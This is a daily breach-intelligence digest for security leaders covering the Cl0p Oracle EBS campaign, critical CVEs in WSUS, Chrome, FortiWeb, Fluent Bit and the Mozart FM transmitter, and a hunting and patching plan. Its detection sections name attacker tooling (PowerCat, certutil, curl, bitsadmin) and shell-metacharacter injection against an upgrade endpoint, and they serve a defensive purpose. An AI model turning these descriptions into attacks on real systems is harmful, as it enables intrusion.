CISOPlatform • Daily Breach Intelligence
Daily Breach Intelligence – 26 November 2025
High-signal incidents, CVEs to watch, detections to run, and a D0/D3 action plan.
Shared via CISO Platform. Use the live tool (daily reports at your convenience)
Focus period: Last 24 hours • Audience: CISOs & Security Leadership
Overall severity: Critical High-signal only CISO-first view
Headlines Severity: [Critical]
-
Oracle E‑Business Suite (EBS) campaign widens – Ivy League & global brands exposed
Dartmouth College has confirmed that its Oracle EBS instance was compromised in the Cl0p campaign; attackers exfiltrated archives totalling ~226 GB of data including personal and financial information (SSNs, etc.). Canon and Mazda have also confirmed being targeted, as Cl0p’s Oracle EBS leak site now lists 100+ alleged victims across sectors.source -
Cl0p’s Oracle-driven data theft: Logitech & others still in the blast radius
New coverage reiterates that Logitech’s earlier-confirmed breach is part of the same Oracle EBS zero‑day campaign (CVE‑2025‑61882), with Cl0p claiming theft of up to 1.8 TB of internal data spanning employees, customers and suppliers.source -
New Critical CVE with unauthenticated RCE in broadcast infrastructure (CVE‑2025‑66253)
CVE‑2025‑66253, published in the last hours, is a 9.9‑rated unauthenticated OS command‑injection bug in DB Elettronica Telecomunicazioni’s Mozart FM Transmitter line; user input passed directly intoexec()allows remote code execution on devices exposed viastart_upgrade.php.source -
WSUS critical flaw actively abused to deploy ShadowPad (CVE‑2025‑59287)
Microsoft’s WSUS deserialization bug (CVSS 9.8) is now confirmed as under active exploitation; AhnLab reports attackers using it for initial access, then PowerCat + certutil/curl to deploy ShadowPad malware with SYSTEM privileges on Windows servers.source -
Oklahoma’s amended breach‑notification law: countdown to Jan 1, 2026
Oklahoma’s SB 626 substantially expands its Security Breach Notification Act (broader PI, new AG‑notification triggers, more prescriptive content requirements) with effective date 1 Jan 2026, increasing multi‑state complexity for any US breach touching Oklahoma residents.source
What’s New
-
Oracle EBS mega‑campaign – higher‑ed, manufacturing, media, finance
-
Dartmouth confirms Oracle EBS compromise in the August zero‑day window; Maine AG filings reference SSNs and other financial data; total impacted individuals still unknown.SecurityWeek
-
Cl0p’s leak site lists over 100 alleged Oracle victims; in a 24‑hour window around 20–21 Nov, at least 29 additional companies were reportedly breached, including Oracle itself, Michelin, Broadcom, Humana, Canon, Mazda, multiple industrials and retailers.Z2Data
-
This remains an ongoing data‑extortion wave rather than a closed incident; new victims are still being named and dumps expanded.
-
-
Financial & healthcare notifications – third‑party exposure theme
-
BOK Financial has notified US state regulators that a vendor (Linedata) incident exposed customer names and SSNs; breach letters began going out 21 Nov.Strauss Borrelli PLLC -
-
Synergy Advanced Healthcare in Connecticut reported a PHI breach to HHS OCR, likely impacting >1,200 individuals; notifications are expected to follow.Strauss Borrelli PLLC -
-
-
Open‑source and browser stack still under stress
-
Fluent Bit logging agent (deployed “billions” of times across major clouds) faces multiple new CVEs, including CVE‑2025‑12972 path traversal, with researchers warning that years‑old bugs left cloud environments exposed and highlighting patch‑coordination challenges.The Register
-
Google’s Chrome zero‑day in V8 (CVE‑2025‑13223) remains an active concern; exploitation in the wild led to emergency updates to 142.0.7444.175/.176 across platforms.TechRadar+1
-
-
Regulatory signalling: state AGs drive privacy enforcement
-
Reuters’ 2025 enforcement review emphasizes US state AGs and dedicated privacy agencies (e.g., California CPPA) as the “leading edge” of privacy law, with coordinated actions, MOUs across states, and record settlements (e.g., Google geolocation, healthline.com).Reuters
-
California AG’s recent $1.4M settlement with Jam City, Inc. for alleged CCPA and UCL violations around children’s data and in‑app monetisation underscores continued focus on mobile and gaming ecosystems.Holland & Knight
-
Exploits & CVEs Watchlist [Critical]
-
CVE‑2025‑66253 – DB Elettronica Mozart FM Transmitter – Unauth RCE (NEW, 9.9) source
-
CVE‑2025‑61882 / CVE‑2025‑61884 – Oracle E‑Business Suite Zero‑day Cluster (Ongoing) source source
-
CVE‑2025‑59287 – Windows Server WSUS RCE (Critical, exploited) source
-
CVE‑2025‑58034 – Fortinet FortiWeb WAF OS Command Injection (KEV) source
-
CVE‑2025‑13223 – Chrome V8 Type‑Confusion RCE (zero‑day) source
-
CVE‑2025‑12972 & related Fluent Bit CVEs – telemetry agent exposures source
-
CVE‑2025‑62215 – Windows Kernel EoP (zero‑day) source
Detections To Run Today [Action Required]
1. Oracle EBS / Cl0p campaign hunts
-
Search Oracle EBS / application logs and web server logs for:
-
Unknown or recently modified JSP/PHP/PLSQL files in EBS web roots (especially BI Publisher & Concurrent Manager directories).
-
Outbound connections from EBS hosts to unfamiliar IPs / ASNs, especially during 9–12 Aug and 20–21 Nov windows or matching current Cl0p IOC lists.Z2Data
-
-
Look for large archive creation and exfil events (ZIP/TAR/7z) originating from EBS service accounts to external endpoints or S3/Blob storage outside your org.
2. WSUS exploitation & ShadowPad
-
On Windows servers running WSUS:
-
Detect suspicious
w3wp.exeor WSUS‑associated processes spawning PowerShell,cmd.exe,powershell.exeexecuting PowerCat,certutil,curl, orbitsadmin.TechRadar -
Correlate with anomalous DLL side‑loading of
ETDCtrlHelper.exeor unexpected services referencing ShadowPad‑related modules.
-
3. Broadcast / OT perimeter (CVE‑2025‑66253)
-
Enumerate and profile any DB Elettronica Mozart transmitters or similar RF infrastructure reachable via IP.
-
Look for HTTP requests to
/var/tdf/start_upgrade.phpor similar upgrade endpoints with unusualfilenameparameters or shell metacharacters.Cuberk
4. Browser & endpoint exposure
-
From EDR / inventory, pull a current list of endpoints with:
-
Flag those endpoints for priority patching and extra monitoring (scripted exploitation patterns, abnormal browser child processes).
5. Fluent Bit & cloud telemetry
-
In Kubernetes and cloud environments:
-
Discover all Fluent Bit instances and versions; flag anything < 4.1.1.The Register
-
Review for abnormal plugin configurations, non‑standard
Path/Tagvalues, and connections to unapproved destinations.
-
Control Checks [Recommended]
-
Oracle EBS controls
-
Confirm all EBS instances (including those at MSPs / outsourced shared services) are patched for CVE‑2025‑61882 and related vulnerabilities per Oracle’s security alerts.Z2Data
-
Enforce strict network segmentation and dedicated outbound gateways for EBS; restrict administrative access to jump‑hosts with MFA and session recording.
-
-
WSUS hardening
-
Apply out‑of‑band updates addressing CVE‑2025‑59287 across WSUS servers; validate successful deployment rather than assuming compliance.TechRadar
-
Restrict who can publish updates to WSUS and require code‑signing verification; ensure WSUS traffic is TLS‑protected and limited to expected subnets.
-
-
FortiWeb & WAF posture
-
Patch FortiWeb to fixed versions for CVE‑2025‑58034; where patching lags, geofence access and enforce strong admin auth (MFA + IP allowlisting).TechRadar
-
Add virtual patching rules to detect/deny suspicious OS‑shell patterns in HTTP/CLI inputs.
-
-
Browser & endpoint baselines
-
Make Chrome/Edge 142.0.7444.175+ the minimum allowed version in your baseline; block older releases via endpoint management.TechRadar
-
Confirm November Windows cumulative updates (including CVE‑2025‑62215 patch) are deployed to all internet‑facing and privileged endpoints.The Hacker News
-
-
Fluent Bit / telemetry stack
-
Standardize a hardened deployment pattern for Fluent Bit (fixed tags/paths, read‑only configs where possible, minimal plugins) and push it across all clusters.The Register
-
Third-Party & SaaS Risks [Action Required]
-
Oracle EBS – hosted & vendor‑managed footprints
-
Identify all service providers (BPO, shared‑services, cloud integrators, MSSPs) operating Oracle EBS on your behalf and request:
-
Patch status for CVE‑2025‑61882/61884 and related EBS fixes.
-
Confirmation of web shell hunting, exfiltration checks and credential rotation.Z2Data
-
-
-
Financial vendors (BOK/Linedata case study)
-
Review your contracts and current due‑diligence for vendors holding SSNs or account data.
-
Ask for detail on: incident identification timelines, regulator notifications (e.g., Maine AG notices), and data‑minimisation practices.Strauss Borrelli PLLC
-
-
Healthcare PHI processors (Synergy example)
-
Confirm that PHI‑handling vendors are under BAA‑equivalent agreements and have explicit breach‑notification SLAs aligned with HHS OCR requirements.Strauss Borrelli PLLC
-
-
Consumer apps & kids’ data (Jam City, broader AG focus)
-
Inventory third‑party SDKs and advertising / analytics partners inside your mobile apps and web properties, especially where children or teens are a material user segment.
-
Check that opt‑outs, consent flows and data‑sharing align with CCPA/CPRA, state kids’ design laws and AG expectations, given recent settlements and broader 2025 enforcement trends.Holland & Knight
-
-
Multi‑state breach law posture (Oklahoma & beyond)
-
Update your legal response playbook to reflect Oklahoma’s amended statute (AG notice, new content requirements) ahead of 1 Jan 2026, and map overlaps with California, Colorado, Texas and others.Troutman Privacy
-
Communication Note
-
Board / ExCo
-
Short note tying together:
-
Oracle EBS campaign impact (sector‑wide; Dartmouth, Canon, Logitech etc.).Red Hot Cyber
-
New high‑impact CVEs (CVE‑2025‑66253, CVE‑2025‑59287, FortiWeb, Chrome).TechRadar
-
Your organisation’s exposure statement (“we do / do not run Oracle EBS; X% of WSUS/Chrome/FortiWeb fleet already patched”).
-
-
-
Regulators / DPO / Legal
-
Brief summarising:
-
Oklahoma’s upcoming breach‑notification changes (SB 626) and how your templates & workflows will be updated.Troutman Privacy
-
Ongoing enforcement themes from state AGs and privacy agencies (children’s privacy, data brokers, AI, opt‑outs).Reuters
-
-
-
IT & Security Ops teams
-
Targeted bulletin focusing on:
-
Required hunts for Oracle EBS, WSUS, Mozart transmitters, Fluent Bit and browsers (see “Detections To Run Today”).
-
Crystal‑clear patch deadlines and owner assignments.
-
-
-
Business / customer‑facing teams
-
Talking points clarifying:
-
Whether you or key vendors are affected by the Oracle/Cl0p campaign.
-
Any planned notifications, credit‑monitoring offers, or service changes if you are in scope.
-
-
Action Plan
Today (D0–D1)
-
Triage Oracle EBS exposure – confirm whether you or any critical vendors run Oracle EBS; if yes, validate patch status, run compromise assessment (web shells, large data exports, unusual outbound traffic).Z2Data
-
Patch & isolate “big four” technical risks:
-
WSUS (CVE‑2025‑59287)
-
FortiWeb (CVE‑2025‑58034)
-
Chrome/Edge (CVE‑2025‑13223)
-
Fluent Bit (CVE‑2025‑12972 cluster)TechRadar
-
-
Kick off hunts for: WSUS exploitation, ShadowPad, Oracle EBS exfiltration, Mozart FM exploitation and suspicious upgrade requests, and any signs of Cl0p‑style exfil staging.
Next 2–3 days (D2–D3)
4. Third‑party review sprint focused on: Oracle EBS operators, core financial and PHI processors, high‑risk mobile/consumer apps.
5. Update IR & notification playbooks to reflect Oklahoma SB 626 and cross‑state coordination patterns highlighted in this year’s privacy enforcement review.Troutman Privacy
Next 7–10 days (D7–D10)
6. Governance uplift: incorporate 2025 enforcement themes (kids’ privacy, data brokers, AI training data, opt‑outs) into your data‑governance roadmap and board‑level risk register.Reuters
7. Technical hardening: finalise standard hardening baselines for WAFs, telemetry agents (Fluent Bit), WSUS / update infra and browser versioning; integrate them into CI/CD and infra‑as‑code.
Comments